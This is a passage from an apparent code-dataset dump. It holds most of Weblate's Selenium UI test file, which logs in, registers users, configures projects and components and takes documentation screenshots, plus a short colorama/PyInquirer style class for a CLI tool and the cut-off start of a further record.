superuser=False):\n # login page\n with self.wait_for_page_load():\n self.click(htmlid=\"login-button\")\n\n # Create user\n if create:\n user = create_test_user()\n if superuser:\n user.is_superuser = True\n user.save()\n user.profile.language = \"en\"\n user.profile.save()\n user.profile.languages.set(\n Language.objects.filter(code__in=(\"he\", \"cs\", \"hu\"))\n )\n else:\n user = None\n\n # Login\n username_input = self.driver.find_element(By.ID, \"id_username\")\n username_input.send_keys(\"weblate@example.org\")\n password_input = self.driver.find_element(By.ID, \"id_password\")\n password_input.send_keys(\"testpassword\")\n\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.XPATH, '//input[@value=\"Sign in\"]'))\n return user\n\n def open_manage(self, login=True):\n # Login as superuser\n if login:\n user = self.do_login(superuser=True)\n else:\n user = None\n\n # Open admin page\n with self.wait_for_page_load():\n 
self.click(htmlid=\"admin-button\")\n return user\n\n def open_admin(self, login=True):\n user = self.open_manage(login)\n with self.wait_for_page_load():\n self.click(\"Tools\")\n with self.wait_for_page_load():\n self.click(\"Django admin interface\")\n return user\n\n def test_failed_login(self):\n self.do_login(create=False)\n\n # We should end up on login page as user was invalid\n self.driver.find_element(By.ID, \"id_username\")\n\n def test_login(self):\n # Do proper login with new user\n self.do_login()\n\n # Load profile\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"settings-button\")\n\n # Wait for profile to load\n self.driver.find_element(By.ID, \"notifications\")\n\n # Load translation memory\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"memory-button\")\n\n self.screenshot(\"memory.png\")\n\n # Finally logout\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"logout-button\")\n\n # We should be back on home page\n self.driver.find_element(By.ID, \"browse-projects\")\n\n def register_user(self):\n # registration page\n with self.wait_for_page_load():\n self.click(htmlid=\"register-button\")\n\n # Fill in registration form\n self.driver.find_element(By.ID, \"id_email\").send_keys(\"weblate@example.org\")\n self.driver.find_element(By.ID, \"id_username\").send_keys(\"test-example\")\n self.driver.find_element(By.ID, \"id_fullname\").send_keys(\"Test Example\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.XPATH, '//input[@value=\"Register\"]'))\n\n # Wait for registration email\n loops = 0\n while not mail.outbox:\n time.sleep(1)\n loops += 1\n if loops > 20:\n break\n\n return self.assert_registration_mailbox()\n\n @override_settings(REGISTRATION_CAPTCHA=False)\n def test_register(self, clear=False):\n \"\"\"Test registration.\"\"\"\n url = self.register_user()\n\n # Delete all cookies\n if clear:\n try:\n self.driver.delete_all_cookies()\n except WebDriverException as error:\n # This usually happens when browser fails to delete some\n # of the cookies for whatever reason.\n warnings.warn(f\"Ignoring: {error}\")\n\n # Confirm account\n self.driver.get(url)\n\n # Check we got message\n self.assertTrue(\n \"You have activated\" in self.driver.find_element(By.TAG_NAME, \"body\").text\n )\n\n # Check we're signed in\n self.click(htmlid=\"user-dropdown\")\n self.assertTrue(\n \"Test Example\" in self.driver.find_element(By.ID, \"profile-name\").text\n )\n\n def test_register_nocookie(self):\n \"\"\"Test registration without cookies.\"\"\"\n self.test_register(True)\n\n @override_settings(WEBLATE_GPG_IDENTITY=\"Weblate \")\n def test_gpg(self):\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.PARTIAL_LINK_TEXT, \"About Weblate\"))\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.PARTIAL_LINK_TEXT, \"Keys\"))\n self.screenshot(\"about-gpg.png\")\n\n def test_ssh(self):\n \"\"\"Test SSH admin interface.\"\"\"\n self.open_admin()\n\n time.sleep(0.5)\n self.screenshot(\"admin.png\")\n\n # Open SSH page\n with self.wait_for_page_load():\n self.click(\"SSH keys\")\n\n # Generate SSH key\n if get_key_data() is None:\n with self.wait_for_page_load():\n self.click(htmlid=\"generate-ssh-button\")\n\n # Add SSH host key\n self.driver.find_element(By.ID, \"id_host\").send_keys(\"github.com\")\n with self.wait_for_page_load():\n self.click(htmlid=\"ssh-add-button\")\n\n 
self.screenshot(\"ssh-keys-added.png\")\n\n # Open SSH page for final screenshot\n with self.wait_for_page_load():\n self.click(\"SSH keys\")\n self.screenshot(\"ssh-keys.png\")\n\n def create_component(self):\n project = Project.objects.create(name=\"WeblateOrg\", slug=\"weblateorg\")\n Component.objects.create(\n name=\"Language names\",\n slug=\"language-names\",\n project=project,\n repo=\"https://github.com/WeblateOrg/demo.git\",\n filemask=\"weblate/langdata/locale/*/LC_MESSAGES/django.po\",\n new_base=\"weblate/langdata/locale/django.pot\",\n file_format=\"po\",\n )\n Component.objects.create(\n name=\"Django\",\n slug=\"django\",\n project=project,\n repo=\"weblate://weblateorg/language-names\",\n filemask=\"weblate/locale/*/LC_MESSAGES/django.po\",\n new_base=\"weblate/locale/django.pot\",\n file_format=\"po\",\n )\n return project\n\n def view_site(self):\n with self.wait_for_page_load():\n self.click(htmlid=\"return-to-weblate\")\n\n def test_dashboard(self):\n self.do_login()\n # Generate nice changes data\n for day in range(365):\n for _unused in range(int(10 + 10 * math.sin(2 * math.pi * day / 30))):\n change = Change.objects.create(action=Change.ACTION_CREATE_PROJECT)\n change.timestamp -= timedelta(days=day)\n change.save()\n\n # Render activity\n self.click(\"Insights\")\n self.click(\"Activity\")\n time.sleep(0.5)\n self.screenshot(\"activity.png\")\n\n # Screenshot search\n self.click(\"Search\")\n self.screenshot(\"search.png\")\n\n @override_settings(AUTHENTICATION_BACKENDS=TEST_BACKENDS)\n def test_auth_backends(self):\n try:\n # psa creates copy of settings...\n orig_backends = social_django.utils.BACKENDS\n social_django.utils.BACKENDS = TEST_BACKENDS\n user = self.do_login()\n user.social_auth.create(provider=\"google-oauth2\", uid=user.email)\n user.social_auth.create(provider=\"github\", uid=\"123456\")\n user.social_auth.create(provider=\"bitbucket\", uid=\"weblate\")\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"settings-button\")\n self.click(\"Account\")\n self.screenshot(\"authentication.png\")\n finally:\n social_django.utils.BACKENDS = orig_backends\n\n def test_screenshots(self):\n \"\"\"Screenshot tests.\"\"\"\n text = (\n \"Automatic translation via machine translation uses active \"\n \"machine translation engines to get the best possible \"\n \"translations and applies them in this project.\"\n )\n self.create_component()\n language = Language.objects.get(code=\"cs\")\n\n source = Unit.objects.get(\n source=text, translation__language=language\n ).source_unit\n source.explanation = \"Help text for automatic translation tool\"\n source.save()\n glossary = Glossary.objects.get()\n Term.objects.create(\n user=None,\n glossary=glossary,\n language=language,\n source=\"machine translation\",\n target=\"strojový překlad\",\n )\n Term.objects.create(\n user=None,\n glossary=glossary,\n language=language,\n source=\"project\",\n target=\"projekt\",\n )\n source.translation.component.alert_set.all().delete()\n\n def capture_unit(name, tab):\n unit = Unit.objects.get(source=text, translation__language=language)\n with self.wait_for_page_load():\n self.driver.get(f\"{self.live_server_url}{unit.get_absolute_url()}\")\n self.click(htmlid=tab)\n self.screenshot(name)\n with self.wait_for_page_load():\n self.click(\"Dashboard\")\n\n def wait_search():\n WebDriverWait(self.driver, 30).until(\n presence_of_element_located(\n (By.XPATH, '//tbody[@id=\"search-results\"]/tr')\n )\n )\n\n self.do_login(superuser=True)\n 
capture_unit(\"source-information.png\", \"toggle-nearby\")\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n with self.wait_for_page_load():\n self.click(\"Django\")\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Screenshots\")\n\n # Upload screenshot\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"Automatic translation\")\n element = self.driver.find_element(By.ID, \"id_image\")\n element.send_keys(\n element._upload(get_test_file(\"screenshot.png\")) # noqa: SLF001\n )\n with self.wait_for_page_load():\n element.submit()\n\n # Perform OCR\n if weblate.screenshots.views.HAS_OCR:\n self.click(htmlid=\"screenshots-auto\")\n wait_search()\n\n self.screenshot(\"screenshot-ocr.png\")\n\n # Add string manually\n self.driver.find_element(By.ID, \"search-input\").send_keys(f\"'{text}'\")\n self.click(htmlid=\"screenshots-search\")\n wait_search()\n self.click(self.driver.find_element(By.CLASS_NAME, \"add-string\"))\n\n # Unit should have screenshot assigned now\n capture_unit(\"screenshot-context.png\", \"toggle-machinery\")\n\n def test_admin(self):\n \"\"\"Test admin interface.\"\"\"\n ConfigurationError.objects.create(\n name=\"test\", message=\"Testing configuration error\"\n )\n self.do_login(superuser=True)\n self.screenshot(\"admin-wrench.png\")\n self.create_component()\n # Open admin page\n self.open_admin(login=False)\n\n # Component list\n with self.wait_for_page_load():\n self.click(\"Component lists\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n element = self.driver.find_element(By.ID, \"id_name\")\n element.send_keys(\"All components\")\n self.click(\"Add another Automatic component list assignment\")\n self.clear_field(\n self.driver.find_element(By.ID, \"id_autocomponentlist_set-0-project_match\")\n ).send_keys(\"^.*$\")\n self.clear_field(\n self.driver.find_element(\n By.ID, \"id_autocomponentlist_set-0-component_match\"\n )\n ).send_keys(\"^.*$\")\n self.screenshot(\"componentlist-add.png\")\n with self.wait_for_page_load():\n element.submit()\n\n # Ensure the component list is there\n with self.wait_for_page_load():\n self.click(\"All components\")\n\n # Announcement\n with self.wait_for_page_load():\n self.click(\"Weblate translations\")\n with self.wait_for_page_load():\n self.click(\"Announcements\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n Select(self.driver.find_element(By.ID, \"id_project\")).select_by_visible_text(\n \"WeblateOrg\"\n )\n element = self.driver.find_element(By.ID, \"id_message\")\n element.send_keys(\"Translations will be used only if they reach 60%.\")\n self.screenshot(\"announcement.png\")\n with self.wait_for_page_load():\n element.submit()\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n Select(self.driver.find_element(By.ID, \"id_language\")).select_by_visible_text(\n \"Czech\"\n )\n element = self.driver.find_element(By.ID, \"id_message\")\n element.send_keys(\"Czech translators rock!\")\n with self.wait_for_page_load():\n element.submit()\n\n # Announcement display\n self.view_site()\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n self.click(\"Manage\")\n self.click(\"Post 
announcement\")\n self.screenshot(\"announcement-project.png\")\n\n with self.wait_for_page_load():\n self.click(\"Dashboard\")\n self.click(htmlid=\"languages-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all languages\")\n with self.wait_for_page_load():\n self.click(\"Czech\")\n self.screenshot(\"announcement-language.png\")\n\n def test_weblate(self):\n user = self.open_admin()\n language_regex = \"^(cs|he|hu)$\"\n\n # Add project\n with self.wait_for_page_load():\n self.click(\"Projects\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"WeblateOrg\")\n Select(self.driver.find_element(By.ID, \"id_access_control\")).select_by_value(\n \"1\"\n )\n self.driver.find_element(By.ID, \"id_web\").send_keys(\"https://weblate.org/\")\n self.driver.find_element(By.ID, \"id_instructions\").send_keys(\n \"https://weblate.org/contribute/\"\n )\n self.screenshot(\"add-project.png\")\n with self.wait_for_page_load():\n self.driver.find_element(By.ID, \"id_name\").submit()\n\n # Add bilingual component\n with self.wait_for_page_load():\n self.click(\"Home\")\n with self.wait_for_page_load():\n self.click(\"Components\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"Language names\")\n Select(self.driver.find_element(By.ID, \"id_project\")).select_by_visible_text(\n \"WeblateOrg\"\n )\n self.driver.find_element(By.ID, \"id_repo\").send_keys(\n \"https://github.com/WeblateOrg/demo.git\"\n )\n self.driver.find_element(By.ID, \"id_repoweb\").send_keys(\n \"https://github.com/WeblateOrg/demo/blob/\"\n \"{{branch}}/{{filename}}#L{{line}}\"\n )\n self.driver.find_element(By.ID, \"id_filemask\").send_keys(\n \"weblate/langdata/locale/*/LC_MESSAGES/django.po\"\n )\n self.driver.find_element(By.ID, \"id_new_base\").send_keys(\n \"weblate/langdata/locale/django.pot\"\n )\n Select(self.driver.find_element(By.ID, \"id_file_format\")).select_by_value(\"po\")\n Select(self.driver.find_element(By.ID, \"id_license\")).select_by_value(\n \"GPL-3.0-or-later\"\n )\n self.clear_field(\n self.driver.find_element(By.ID, \"id_language_regex\")\n ).send_keys(language_regex)\n self.screenshot(\"add-component.png\")\n # This takes long\n with self.wait_for_page_load(timeout=1200):\n self.driver.find_element(By.ID, \"id_name\").submit()\n with self.wait_for_page_load():\n self.click(\"Language names\")\n\n # Add monolingual component\n with self.wait_for_page_load():\n self.click(\"Components\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"addlink\"))\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"Android\")\n Select(self.driver.find_element(By.ID, \"id_project\")).select_by_visible_text(\n \"WeblateOrg\"\n )\n self.driver.find_element(By.ID, \"id_repo\").send_keys(\n \"weblate://weblateorg/language-names\"\n )\n self.driver.find_element(By.ID, \"id_filemask\").send_keys(\n \"app/src/main/res/values-*/strings.xml\"\n )\n self.driver.find_element(By.ID, \"id_template\").send_keys(\n \"app/src/main/res/values/strings.xml\"\n )\n Select(self.driver.find_element(By.ID, \"id_file_format\")).select_by_value(\n \"aresource\"\n )\n Select(self.driver.find_element(By.ID, \"id_license\")).select_by_value(\"MIT\")\n self.screenshot(\"add-component-mono.png\")\n # This takes long\n with self.wait_for_page_load(timeout=1200):\n 
self.driver.find_element(By.ID, \"id_name\").submit()\n with self.wait_for_page_load():\n self.click(\"Android\")\n\n # Load Weblate project page\n self.view_site()\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n\n self.screenshot(\"project-overview.png\")\n\n # User management\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Users\")\n element = self.driver.find_element(By.ID, \"id_user\")\n element.send_keys(\"testuser\")\n with self.wait_for_page_load():\n element.submit()\n with self.wait_for_page_load():\n self.click(\"Manage users\")\n self.screenshot(\"manage-users.png\")\n # Access control setings\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Settings\")\n self.click(\"Access\")\n self.screenshot(\"project-access.png\")\n self.click(\"Workflow\")\n self.screenshot(\"project-workflow.png\")\n # The project is now watched\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n\n # Engage page\n self.click(\"Share\")\n with self.wait_for_page_load():\n self.click(\"Status widgets\")\n self.screenshot(\"promote.png\")\n with self.wait_for_page_load():\n self.click(htmlid=\"engage-link\")\n self.screenshot(\"engage.png\")\n with self.wait_for_page_load():\n self.click(htmlid=\"engage-project\")\n\n # Glossary\n with self.wait_for_page_load():\n self.click(\"Glossaries\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.PARTIAL_LINK_TEXT, \"Czech\"))\n self.click(\"Add new word\")\n self.driver.find_element(By.ID, \"id_source\").send_keys(\"language\")\n element = self.driver.find_element(By.ID, \"id_target\")\n element.send_keys(\"jazyk\")\n with self.wait_for_page_load():\n element.submit()\n self.screenshot(\"glossary-edit.png\")\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n with self.wait_for_page_load():\n self.click(\"Glossaries\")\n self.screenshot(\"project-glossaries.png\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n\n # Addons\n self.click(\"Components\")\n with self.wait_for_page_load():\n self.click(\"Language names\")\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Addons\")\n self.screenshot(\"addons.png\")\n with self.wait_for_page_load():\n self.click(\n self.driver.find_element(\n By.XPATH, '//button[@data-addon=\"weblate.discovery.discovery\"]'\n )\n )\n element = self.driver.find_element(By.ID, \"id_match\")\n element.send_keys(\n \"weblate/locale/(?P[^/]*)/LC_MESSAGES/\"\n \"(?P[^/]*)\\\\.po\"\n )\n self.clear_field(\n self.driver.find_element(By.ID, \"id_language_regex\")\n ).send_keys(language_regex)\n self.driver.find_element(By.ID, \"id_new_base_template\").send_keys(\n \"weblate/locale/{{ component }}.pot\"\n )\n self.clear_field(self.driver.find_element(By.ID, \"id_name_template\")).send_keys(\n \"{{ component|title }}\"\n )\n Select(self.driver.find_element(By.ID, \"id_file_format\")).select_by_value(\"po\")\n with self.wait_for_page_load():\n element.submit()\n self.screenshot(\"addon-discovery.png\")\n element = self.driver.find_element(By.ID, \"id_confirm\")\n self.click(element)\n # This takes long\n with self.wait_for_page_load(timeout=1200):\n element.submit()\n with self.wait_for_page_load():\n 
self.click(\"Language names\")\n\n # Reports\n self.click(\"Insights\")\n self.click(\"Translation reports\")\n self.click(\"Insights\")\n self.screenshot(\"reporting.png\")\n\n # Contributor agreeement\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Settings\")\n element = self.driver.find_element(By.ID, \"id_agreement\")\n element.send_keys(\"This is an agreement.\")\n with self.wait_for_page_load():\n element.submit()\n with self.wait_for_page_load():\n self.click(\"Language names\")\n self.screenshot(\"contributor-agreement.png\")\n with self.wait_for_page_load():\n self.click(\"View contributor agreement\")\n element = self.driver.find_element(By.ID, \"id_confirm\")\n self.click(element)\n with self.wait_for_page_load():\n element.submit()\n\n # Translation page\n with self.wait_for_page_load():\n self.click(\"Czech\")\n with self.wait_for_page_load():\n self.click(\"Django\")\n self.screenshot(\"strings-to-check.png\")\n self.click(\"Files\")\n self.click(\"Upload translation\")\n self.click(\"Files\")\n self.screenshot(\"export-import.png\")\n self.click(\"Tools\")\n self.click(\"Automatic translation\")\n self.click(htmlid=\"id_select_auto_source_2\")\n self.click(\"Tools\")\n self.screenshot(\"automatic-translation.png\")\n self.click(\"Search\")\n element = self.driver.find_element(By.ID, \"id_q\")\n element.send_keys(\"'%(count)s word'\")\n with self.wait_for_page_load():\n element.submit()\n self.click(\"History\")\n self.screenshot(\"format-highlight.png\")\n self.click(\"Comments\")\n self.screenshot(\"plurals.png\")\n\n # Test search dropdown\n dropdown = self.driver.find_element(By.ID, \"query-dropdown\")\n dropdown.click()\n time.sleep(0.5)\n self.screenshot(\"query-dropdown.png\")\n with self.wait_for_page_load():\n self.click(\n self.driver.find_element(By.PARTIAL_LINK_TEXT, \"Not translated strings\")\n )\n self.driver.find_element(By.ID, \"id_34a4642999e44a2b_0\")\n\n # Test sort dropdown\n sort = self.driver.find_element(By.ID, \"query-sort-dropdown\")\n sort.click()\n time.sleep(0.5)\n self.screenshot(\"query-sort.png\")\n with self.wait_for_page_load():\n self.click(\"Position\")\n\n # Return to original unit\n element = self.driver.find_element(By.ID, \"id_q\")\n self.clear_field(element)\n element.send_keys(\"'%(count)s word'\")\n with self.wait_for_page_load():\n element.submit()\n\n # Trigger check\n self.clear_field(self.driver.find_element(By.ID, \"id_a2a808c8ccbece08_0\"))\n element = self.driver.find_element(By.ID, \"id_a2a808c8ccbece08_1\")\n self.clear_field(element)\n element.send_keys(\"několik slov\")\n with self.wait_for_page_load():\n element.submit()\n self.screenshot(\"checks.png\")\n\n # Secondary language display\n user.profile.secondary_languages.set(Language.objects.filter(code__in=(\"he\",)))\n with self.wait_for_page_load():\n self.click(\"Czech\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.PARTIAL_LINK_TEXT, \"All strings\"))\n self.click(\"Other languages\")\n self.screenshot(\"secondary-language.png\")\n\n # RTL translation\n with self.wait_for_page_load():\n self.click(\"Django\")\n with self.wait_for_page_load():\n self.click(\"Hebrew\")\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.PARTIAL_LINK_TEXT, \"All strings\"))\n self.screenshot(\"visual-keyboard.png\")\n\n # Profile\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"settings-button\")\n self.click(\"Preferences\")\n 
self.screenshot(\"dashboard-dropdown.png\")\n self.click(\"Notifications\")\n self.screenshot(\"profile-subscriptions.png\")\n self.click(\"Licenses\")\n self.screenshot(\"profile-licenses.png\")\n\n # Dashboard\n with self.wait_for_page_load():\n self.click(\"Dashboard\")\n self.screenshot(\"your-translations.png\")\n\n @modify_settings(INSTALLED_APPS={\"append\": \"weblate.billing\"})\n def test_add_component(self):\n \"\"\"Test user adding project and component.\"\"\"\n user = self.do_login()\n create_test_billing(user)\n\n # Open billing page\n self.click(htmlid=\"user-dropdown\")\n with self.wait_for_page_load():\n self.click(htmlid=\"billing-button\")\n self.screenshot(\"user-billing.png\")\n\n # Click on add project\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"billing-add-project\"))\n\n # Add project\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"WeblateOrg\")\n self.driver.find_element(By.ID, \"id_web\").send_keys(\"https://weblate.org/\")\n self.driver.find_element(By.ID, \"id_instructions\").send_keys(\n \"https://weblate.org/contribute/\"\n )\n self.screenshot(\"user-add-project.png\")\n with self.wait_for_page_load():\n self.driver.find_element(By.ID, \"id_name\").submit()\n self.screenshot(\"user-add-project-done.png\")\n\n # Click on add component\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"project-add-component\"))\n\n # Add component\n self.driver.find_element(By.ID, \"id_name\").send_keys(\"Language names\")\n self.driver.find_element(By.ID, \"id_repo\").send_keys(\n \"https://github.com/WeblateOrg/demo.git\"\n )\n self.screenshot(\"user-add-component-init.png\")\n with self.wait_for_page_load(timeout=1200):\n self.driver.find_element(By.ID, \"id_name\").submit()\n\n self.screenshot(\"user-add-component-discovery.png\")\n self.driver.find_element(By.ID, \"id_id_discovery_0_1\").click()\n with self.wait_for_page_load(timeout=1200):\n self.driver.find_element(By.ID, \"id_name\").submit()\n\n self.driver.find_element(By.ID, \"id_repoweb\").send_keys(\n \"https://github.com/WeblateOrg/demo/blob/\"\n \"{{branch}}/{{filename}}#L{{line}}\"\n )\n self.driver.find_element(By.ID, \"id_filemask\").send_keys(\n \"weblate/langdata/locale/*/LC_MESSAGES/django.po\"\n )\n self.driver.find_element(By.ID, \"id_new_base\").send_keys(\n \"weblate/langdata/locale/django.pot\"\n )\n Select(self.driver.find_element(By.ID, \"id_file_format\")).select_by_value(\"po\")\n Select(self.driver.find_element(By.ID, \"id_license\")).select_by_value(\n \"GPL-3.0-or-later\"\n )\n self.clear_field(\n self.driver.find_element(By.ID, \"id_language_regex\")\n ).send_keys(\"^(cs|he|hu)$\")\n self.screenshot(\"user-add-component.png\")\n\n def test_alerts(self):\n project = Project.objects.create(name=\"WeblateOrg\", slug=\"weblateorg\")\n Component.objects.create(\n name=\"Duplicates\",\n slug=\"duplicates\",\n project=project,\n repo=\"https://github.com/WeblateOrg/test.git\",\n filemask=\"po-duplicates/*.dpo\",\n new_base=\"po-duplicates/hello.pot\",\n file_format=\"po\",\n )\n self.do_login(superuser=True)\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n with self.wait_for_page_load():\n self.click(\"Duplicates\")\n self.click(\"Alerts\")\n self.screenshot(\"alerts.png\")\n\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Community localization checklist\")\n 
self.screenshot(\"guide.png\")\n\n def test_fonts(self):\n self.create_component()\n self.do_login(superuser=True)\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Fonts\")\n\n self.click(htmlid=\"tab_fonts\")\n\n # Upload font\n element = self.driver.find_element(By.ID, \"id_font\")\n element.send_keys(element._upload(FONT)) # noqa: SF01,SLF001\n with self.wait_for_page_load():\n self.click(htmlid=\"upload_font_submit\")\n\n self.screenshot(\"font-edit.png\")\n\n with self.wait_for_page_load():\n self.click(\"Fonts\")\n\n # Upload second font\n element = self.driver.find_element(By.ID, \"id_font\")\n element.send_keys(element._upload(SOURCE_FONT)) # noqa: SF01,SLF001\n with self.wait_for_page_load():\n self.click(htmlid=\"upload_font_submit\")\n\n with self.wait_for_page_load():\n self.click(\"Fonts\")\n\n self.screenshot(\"font-list.png\")\n\n self.click(htmlid=\"tab_groups\")\n\n # Create group\n Select(self.driver.find_element(By.ID, \"id_group_font\")).select_by_visible_text(\n \"Source Sans Pro Bold\"\n )\n element = self.driver.find_element(By.ID, \"id_group_name\")\n element.send_keys(\"default-font\")\n with self.wait_for_page_load():\n element.submit()\n\n Select(self.driver.find_element(By.ID, \"id_font\")).select_by_visible_text(\n \"Droid Sans Fallback Regular\"\n )\n element = self.driver.find_element(By.ID, \"id_language\")\n Select(element).select_by_visible_text(\"Japanese\")\n with self.wait_for_page_load():\n element.submit()\n Select(self.driver.find_element(By.ID, \"id_font\")).select_by_visible_text(\n \"Droid Sans Fallback Regular\"\n )\n element = self.driver.find_element(By.ID, \"id_language\")\n Select(element).select_by_visible_text(\"Korean\")\n with self.wait_for_page_load():\n element.submit()\n\n self.screenshot(\"font-group-edit.png\")\n\n with self.wait_for_page_load():\n self.click(\"Font groups\")\n\n self.screenshot(\"font-group-list.png\")\n\n def test_backup(self):\n self.create_temp()\n try:\n self.open_manage()\n self.screenshot(\"support.png\")\n with self.wait_for_page_load():\n self.click(\"Backups\")\n element = self.driver.find_element(By.ID, \"id_repository\")\n element.send_keys(self.tempdir)\n with self.wait_for_page_load():\n element.submit()\n with self.wait_for_page_load():\n self.click(self.driver.find_element(By.CLASS_NAME, \"runbackup\"))\n self.click(self.driver.find_element(By.CLASS_NAME, \"createdbackup\"))\n time.sleep(0.5)\n self.screenshot(\"backups.png\")\n finally:\n self.remove_temp()\n\n def test_explanation(self):\n project = self.create_component()\n Component.objects.create(\n name=\"Android\",\n slug=\"android\",\n project=project,\n repo=\"weblate://weblateorg/language-names\",\n filemask=\"app/src/main/res/values-*/strings.xml\",\n template=\"app/src/main/res/values/strings.xml\",\n file_format=\"aresource\",\n )\n\n self.do_login(superuser=True)\n self.click(htmlid=\"projects-menu\")\n with self.wait_for_page_load():\n self.click(\"Browse all projects\")\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Labels\")\n element = self.driver.find_element(By.ID, \"id_name\")\n element.send_keys(\"Current sprint\")\n self.click(self.driver.find_element(By.CLASS_NAME, \"label-green\"))\n with self.wait_for_page_load():\n element.submit()\n element 
= self.driver.find_element(By.ID, \"id_name\")\n element.send_keys(\"Next sprint\")\n self.click(self.driver.find_element(By.CLASS_NAME, \"label-aqua\"))\n with self.wait_for_page_load():\n element.submit()\n self.screenshot(\"labels.png\")\n\n # Navigate to component\n with self.wait_for_page_load():\n self.click(\"WeblateOrg\")\n with self.wait_for_page_load():\n self.click(\"Android\")\n\n # Edit variant configuration\n self.click(\"Manage\")\n with self.wait_for_page_load():\n self.click(\"Settings\")\n self.click(\"Translation\")\n element = self.driver.find_element(By.ID, \"id_variant_regex\")\n element.send_keys(\"_(short|min)$\")\n self.screenshot(\"variants-settings.png\")\n with self.wait_for_page_load():\n element.submit()\n\n # Navigate to the source language\n with self.wait_for_page_load():\n self.click(\"Android\")\n with self.wait_for_page_load():\n self.click(\"English\")\n self.screenshot(\"source-review.png\")\n\n # Find string with variants\n self.click(\"Search\")\n element = self.driver.find_element(By.ID, \"id_q\")\n element.send_keys(\"Monday\")\n with self.wait_for_page_load():\n element.submit()\n self.screenshot(\"source-review-detail.png\")\n\n # Display variants\n self.click(htmlid=\"toggle-variants\")\n self.screenshot(\"variants-translate.png\")\n\n # Edit context\n self.click(htmlid=\"edit-context\")\n time.sleep(0.5)\n self.screenshot(\"source-review-edit.png\", scroll=False)\n\n # Close modal dialog\n self.driver.find_element(By.ID, \"id_extra_flags\").send_keys(Keys.ESCAPE)\n time.sleep(0.5)\n","repo_name":"imfht/djangoapps","sub_path":"weblate-master/weblate/trans/tests/test_selenium.py","file_name":"test_selenium.py","file_ext":"py","file_size_in_byte":43812,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"95"} +{"seq_id":"5108923200","text":"import collections\nfrom PyInquirer import style_from_dict, Token\nimport colorama\n\n\"\"\"\n@author: tiannamen (FernandoNSC5)\n12/08/2021\n\"\"\"\nclass Style():\n\n def __init__(self):\n colorama.init()\n self.__loadStyles()\n self.__loadColors()\n\n def __loadColors(self):\n self.RED = colorama.Fore.RED\n self.GREEN = colorama.Fore.GREEN\n self.CYAN = colorama.Fore.CYAN\n self.MAGENTA = colorama.Fore.LIGHTMAGENTA_EX\n self.RESET = colorama.Fore.RESET\n\n def __loadStyles(self):\n self.CLI_FORMAT = style_from_dict({\n Token.Separator: '#cc5454',\n Token.QuestionMark: '#673ab7 bold',\n Token.Selected: '#cc5454', # default\n Token.Pointer: '#673ab7 bold',\n Token.Instruction: '', # default\n Token.Answer: '#f44336 bold',\n Token.Question: '',\n })","repo_name":"FernandoNSC5/ConfectoryCLI","sub_path":"assets/Style.py","file_name":"Style.py","file_ext":"py","file_size_in_byte":879,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"95"} +{"seq_id":"31684224063","text":"f_in = open('input.txt', 'r', encoding='utf8')\n\n\ndef 